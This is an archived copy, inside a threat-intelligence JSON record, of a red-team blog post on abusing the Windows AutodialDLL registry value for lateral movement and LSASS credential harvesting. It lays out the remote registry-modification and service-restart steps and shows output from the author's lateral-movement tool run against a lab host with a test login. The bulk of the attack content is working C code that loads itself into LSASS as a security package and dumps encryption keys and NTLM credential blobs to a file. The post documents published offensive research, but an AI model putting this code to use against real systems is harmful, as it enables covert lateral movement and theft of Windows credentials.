{ "id": "9fdb301f-7e00-47ad-b159-28d1aaec93a1", "created_at": "2026-04-06T00:12:56.797361Z", "updated_at": "2026-04-10T03:31:32.13105Z", "deleted_at": null, "sha1_hash": "812c69b805ac105421d4ddee2cfc54de64479205", "title": "Autodial(DLL)ing Your Way - MDSec", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 555866, "plain_text": "Autodial(DLL)ing Your Way - MDSec\r\nBy Admin\r\nPublished: 2022-10-26 · Archived: 2026-04-05 13:00:11 UTC\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 1 of 12\n\nAdversary Simulation\r\nOur best in class red team can deliver a holistic cyber attack simulation to provide a true evaluation of your\r\norganisation’s cyber resilience.\r\nApplication\r\nSecurity\r\nLeverage the team behind the industry-leading Web Application and Mobile Hacker’s Handbook series.\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 2 of 12\n\nPenetration\r\nTesting\r\nMDSec’s penetration testing team is trusted by companies from the world’s leading technology firms to\r\nglobal financial institutions.\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 3 of 12\n\nResponse\r\nOur certified team work with customers at all stages of the Incident Response lifecycle through our range\r\nof proactive and reactive services.\r\nResearch\r\nMDSec’s dedicated research team periodically releases white papers, blog posts, and tooling.\r\nTraining\r\nMDSec’s training courses are informed by our security consultancy and research functions, ensuring you\r\nbenefit from the latest and most applicable trends in the field.\r\nInsights\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 4 of 12\n\nView insights from MDSec’s consultancy and research teams.\r\nThe use of the AutodialDLL registry subkey (located in\r\nHKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters ) as a persistence method has been\r\npreviously documented by @Hexacorn in his series Beyond good ol’ Run key, (Part 24). The use of this\r\npersistence method by Threat Actors has been identified in the wild during last years, examples include:\r\nKOMPROGO backdoor integrated this persistence method.\r\nOperation Dragon Castling.\r\nAlthough its use has been limited to persistence only, this registry key can be used for other purposes. In this\r\narticle we are going to discuss other creative tactics related to this registry key.\r\nLateral Movement\r\nWhen the WinSock2 library is used by a process, the process also loads other additional DLLs to provide the\r\nfunctionalities for different WinSock2 service providers. The DLL defined by the AutodialDLL subkey is one of\r\nthese “extra” DLLs that can be loaded. By default, this is set to c:\\\\windows\\\\system32\\\\rasadhlp.dll .\r\nIf we modify this registry entry with a path to a dummy DLL that traces attach/detach events we can see how our\r\nDLL starts to be loaded gradually for each new process that tries to connect to the internet:\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\r\n[+] On Attach!C:\\Program Files\\Sublime Text 3\\sublime_text.exe\r\n[+] On Attach!C:\\Windows\\system32\\lsass.exe\r\n[+] On Attach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Dettach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Attach!C:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe\r\n[+] On Attach!C:\\Windows\\system32\\svchost.exe\r\n[+] On Attach!C:\\Windows\\System32\\svchost.exe\r\n[+] On Dettach!C:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe\r\n[+] On Attach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Dettach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Attach!C:\\Program Files\\Mozilla Firefox\\firefox.exe\r\n[+] On Dettach!C:\\Program Files\\Mozilla Firefox\\firefox.exe\r\n[+] On Dettach!C:\\Windows\\System32\\svchost.exe\r\n[+] On Attach!C:\\Windows\\system32\\msfeedssync.exe\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Dettach!C:\\Windows\\system32\\msfeedssync.exe\r\n[+] On Dettach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Attach!C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Microso\r\n[+] On Dettach!C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Micros\r\n[+] On Attach!C:\\Windows\\system32\\svchost.exe\r\n[+] On Dettach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 5 of 12\n\nThis behaviour can be exploited to perform lateral movement. Generally speaking, the idea is to upload a DLL to\r\nthe target machine via SMB and then modify the registry via the Remote Registry service or WMI. Next time a\r\nprocess leverages Winsock2, it would load our planted DLL and the execution of our payload would be triggered.\r\nThis generic approach needs to be polished to solve a few inconveniences:\r\nThe DLL would be loaded by multiple processes until the registry key is restored.\r\nThe DLL would be loaded by non-privileged processes, meaning that we would spawn multiple restricted\r\nbeacons.\r\nThe first issue can be easily solved if our DLL proceeds to restore the registry entry once it is loaded by a process\r\nwith sufficient privileges. To do this we can do something as simple as executing this on attach:\r\n LPCSTR orig = \"C:\\\\windows\\\\system32\\\\rasadhlp.dll\";\r\n HKEY hKey;\r\n if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters\", 0, KEY_AL\r\n RegSetValueExA(hKey, \"AutodialDLL\", 0, REG_SZ, (LPBYTE)orig, strlen(orig) + 1);\r\n RegCloseKey(hKey);\r\n }\r\nWith this trick we can reduce the time frame where the DLL could be loaded but the problem of waiting for a high\r\nprivileged process to load it still remains. The best way to reduce the time window, and at the same time ensure\r\nthat the DLL is loaded by a juicy process (in the sense that it has sufficient privileges) is to start/restart a service\r\nimmediately after modifying the registry entry. After testing, potential candidates include the BITS and Windows\r\nInsider (wisvc) services. This brings our end to end methodology to:\r\n1. Upload the DLL to the target.\r\n2. Check if Remote Registry is running, if not then start it.\r\n3. Modify HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL to point to our\r\nDLL.\r\n4. If Remote Registry was not enabled, stop the service to keep the same status.\r\n5. Check if Windows Insider Service (wisvc) or BITS service is running and restart/start it.\r\n6. The DLL would revert the registry key to the old value (C:\\windows\\system32\\rasadhlp.dll)\r\n7. Profit!\r\nAll the necessary functionality is implemented in Impacket, so the easiest way to implement this approach is to\r\ncreate a tool using this framework:\r\npsyconauta@insulanova:~/Research/autodialdll|⇒ python3 autodialmov.py -u eddard.stark -p 'FightP3aceAndHonor\r\n AUTODIALmov - @TheXC3LL\r\n[+] Connecting to 192.168.56.20\r\n[+] Uploading AutodialDLL-test.dll to c:\\lolo.dll\r\n[+] Checking Remote Registry service status...\r\n[+] Service is down!\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 6 of 12\n\n[+] Starting Remote Registry service...\r\n[+] Connecting to 192.168.56.20\r\n[+] Updating AutodialDLL value\r\n[+] Stopping Remote Registry Service\r\n[+] Checking BITS service status...\r\n[+] Service is down!\r\n[+] Starting BITS service\r\n[+] Sir, your beacon should be alive!\r\n[+] Finished!\r\n[^] Have a nice day!\r\nCredential harvesting\r\nThe article about Operation Dragon Castling documents how the Threat Actor registered a security support\r\nprovider (SSP) for persistence. In our case, we can combine both TTPs (AutodialDLL and SSP) in the same DLL\r\nto collect credentials from remote machines.\r\nIt is possible to force lsass process to load a new DLL in the form of a Security Service Provider without rebooting\r\nthe computer by using the RPC call that uses the AddSecurityPackage API. This was documented by @xpn in\r\nhis article Exploring Mimikatz – Part 2 – SSP. We are going to reuse his code to perform the SSP load. But instead\r\nof patching LSASS to collect new credentials in plaintext, we are going to hunt for NTLM hashes in lsasrv.dll\r\nmemory (similarly to sekurlsa::msv ).\r\nFirst, our DLL must determine whether it has been loaded by lsass.exe or a different process. For the latter case,\r\nthe RPC call must be executed so lsass.exe would load this same DLL (also will need to revert the AutodialDLL\r\nentry to its original value to prevent additional loads). If it has already been already loaded by LSASS, then it\r\nsimply would have to look up the hashes in memory and save them in a text file, for example:\r\nvoid onAttach(void) {\r\n LPSTR path = (LPSTR)malloc(MAX_PATH);\r\n GetModuleFileNameA(NULL, path, MAX_PATH);\r\n if (strncmp(path, \"C:\\\\Windows\\\\system32\\\\lsass.exe\", MAX_PATH) == 0) { getHashes(); }\r\n else {\r\n LPCSTR orig = \"C:\\\\windows\\\\system32\\\\rasadhlp.dll\";\r\n HKEY hKey;\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 7 of 12\n\nif (RegOpenKeyExA(HKEY_LOCAL_MACHINE, \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters\", 0, KE\r\n RegSetValueExA(hKey, \"AutodialDLL\", 0, REG_SZ, (LPBYTE)orig, strlen(orig) + 1);\r\n RegCloseKey(hKey);\r\n addSSP();\r\n }\r\n }\r\n free(path);\r\n}\r\nIn both cases the DLL would return FALSE from DllMain to prevent the DLL from residing in either process.\r\nBOOL WINAPI DllMain(\r\n HINSTANCE hinstDLL,\r\n DWORD fdwReason,\r\n LPVOID lpReserved)\r\n{\r\n switch (fdwReason)\r\n {\r\n case DLL_PROCESS_ATTACH:\r\n ourself = hinstDLL;\r\n onAttach();\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n }\r\n return FALSE;\r\n}\r\nThis time I am only interested in retrieving NTLM hashes, so I am going to implement something like the\r\nsekurlsa::msv from Mimikatz as Proof of Concept (as our DLL would be loaded inside LSASS, it is trivial to\r\nimitate any functionality from Mimikatz so I picked the quickest to implement as PoC).\r\nThis is well explained in the article Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD from\r\nMatteo Malvica, so it is redundant to explain it again here. In essence we are going to search for signatures inside\r\nlsasrv.dll and then retrieve the info needed to locate the LogonSessionList struct and the crypto keys/IVs\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 8 of 12\n\nneeded. As I am imitating the post from Matteo Malvica for this PoC, I am going to retrieve only the cryptoblobs\r\nthat are encrypted with Triple-DES:\r\n//...\r\nHMODULE ourself = NULL;\r\n// In this PoC I am targeting a Windows 1809. For a real usage it needs to check the Windows version and choose\r\n// https://github.com/gentilkiwi/mimikatz/blob/a2271237d168c6ca40d11ece565cf97a5e1d3fc1/mimikatz/modules/sekurls\r\nBYTE LsaInitialize_needle[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8,\r\nBYTE LogonSessionList_needle[] = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };\r\n//...\r\nvoid getHashes(void) {\r\n unsigned char* moduleBase;\r\n DWORD offset;\r\n DWORD offsetLogonSessionList_needle;\r\n unsigned char* iv_vector;\r\n unsigned char* DES_key = NULL;\r\n ULONGLONG iv_offset = 0;\r\n ULONGLONG hDes_offset = 0;\r\n ULONGLONG DES_pointer = 0;\r\n ULONGLONG LogonSessionList_offset = 0;\r\n unsigned char* currentElem = NULL;\r\n unsigned char* LogonSessionList;\r\n KIWI_BCRYPT_HANDLE_KEY h3DesKey;\r\n KIWI_BCRYPT_KEY81 extracted3DesKey;\r\n moduleBase = (unsigned char*)GetModuleHandleA(\"lsasrv.dll\");\r\n offset = SearchPattern(moduleBase, LsaInitialize_needle, sizeof(LsaInitialize_needle), 0x200000);\r\n \r\n FILE* file;\r\n if ((file = fopen(\"C:\\\\pwned.pwn\", \"ab\")) == NULL) {\r\n return;\r\n }\r\n char* loginfo;\r\n memcpy(\u0026iv_offset, offset + moduleBase + 0x43, 4);\r\n iv_vector = (unsigned char*)malloc(16);\r\n memcpy(iv_vector, offset + moduleBase + 0x43 + 4 + iv_offset, 16);\r\n fwrite(\"IV:\", strlen(\"IV:\"), 1, file);\r\n for (int i = 0; i \u003c 16; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", iv_vector[i]);\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 9 of 12\n\nfwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(iv_vector);\r\n memcpy(\u0026hDes_offset, moduleBase + offset - 0x59, 4);\r\n memcpy(\u0026DES_pointer, moduleBase + offset - 0x59 + 4 + hDes_offset, 8);\r\n memcpy(\u0026h3DesKey, (void *)DES_pointer, sizeof(KIWI_BCRYPT_HANDLE_KEY));\r\n memcpy(\u0026extracted3DesKey, h3DesKey.key, sizeof(KIWI_BCRYPT_KEY81));\r\n DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret);\r\n memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);\r\n fwrite(\"\\n3DES: \", strlen(\"\\n3DES:\"), 1, file);\r\n for (int i = 0; i \u003c extracted3DesKey.hardkey.cbSecret; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", DES_key[i]);\r\n fwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(DES_key);\r\n offsetLogonSessionList_needle = SearchPattern(moduleBase, LogonSessionList_needle, sizeof(LogonSessionList_n\r\n memcpy(\u0026LogonSessionList_offset, moduleBase + offsetLogonSessionList_needle + 0x17, 4);\r\n LogonSessionList = moduleBase + offsetLogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset;\r\n while (currentElem != LogonSessionList) {\r\n if (currentElem == NULL) {\r\n currentElem = LogonSessionList;\r\n }\r\n ULONGLONG tmp = 0;\r\n USHORT length = 0;\r\n LPWSTR username = NULL;\r\n ULONGLONG username_pointer = 0;\r\n memcpy(\u0026tmp, currentElem, 8);\r\n currentElem = (unsigned char*)tmp;\r\n memcpy(\u0026length, (void*)(tmp + 0x90), 2);\r\n username = (LPWSTR)malloc(length + 2);\r\n memset(username, 0, length + 2);\r\n memcpy(\u0026username_pointer, (void*)(tmp + 0x98), 8);\r\n memcpy(username, (void*)username_pointer, length);\r\n \r\n loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nUser: %S\\n\", username);\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n free(username);\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 10 of 12\n\nULONGLONG credentials_pointer = 0;\r\n memcpy(\u0026credentials_pointer, (void*)(tmp + 0x108), 8);\r\n if (credentials_pointer == 0) {\r\n continue;\r\n }\r\n \r\n ULONGLONG primaryCredentials_pointer = 0;\r\n memcpy(\u0026primaryCredentials_pointer, (void*)(credentials_pointer + 0x10), 8);\r\n USHORT cryptoblob_size = 0;\r\n memcpy(\u0026cryptoblob_size, (void*)(primaryCredentials_pointer + 0x18), 4);\r\n if (cryptoblob_size % 8 != 0) {\r\n loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nPasswordErr: NOT COMPATIBLE WITH 3DES, skipping\\n\");\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n continue;\r\n }\r\n ULONGLONG cryptoblob_pointer = 0;\r\n memcpy(\u0026cryptoblob_pointer, (void*)(primaryCredentials_pointer + 0x20), 8);\r\n unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size);\r\n memcpy(cryptoblob, (void*)cryptoblob_pointer, cryptoblob_size);\r\n loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nPassword:\");\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n for (int i = 0; i \u003c cryptoblob_size; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", cryptoblob[i]);\r\n fwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(cryptoblob);\r\n \r\n }\r\n fclose(file);\r\n}\r\n//...\r\nFinally, we only need to adapt our previous python script to read the text file containing the info collected (and to\r\nperform the decryption of the cryptoblobs):\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 11 of 12\n\nThe code for this PoC can be found in this GitHub repo.\r\nThis blog post was written by Juan Manuel-Fernandez.\r\nReady to engage\r\nwith MDSec?\r\nStay updated with the latest\r\nnews from MDSec.\r\nSource: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\nPage 12 of 12\n\n https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/ \nAutodial(DLL)ing Your Way -MDSec\nBy Admin \nPublished: 2022-10-26 · Archived: 2026-04-05 13:00:11 UTC\n Page 1 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/" ], "report_names": [ "autodialdlling-your-way" ], "threat_actors": [ { "id": "06260304-49f9-4d51-a22d-373c7fcb80ca", "created_at": "2022-10-25T16:07:23.944881Z", "updated_at": "2026-04-10T02:00:04.801806Z", "deleted_at": null, "main_name": "Operation Dragon Castling", "aliases": [], "source_name": "ETDA:Operation Dragon Castling", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434376, "ts_updated_at": 1775791892, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.pdf", "text": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.txt", "img": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.jpg" } }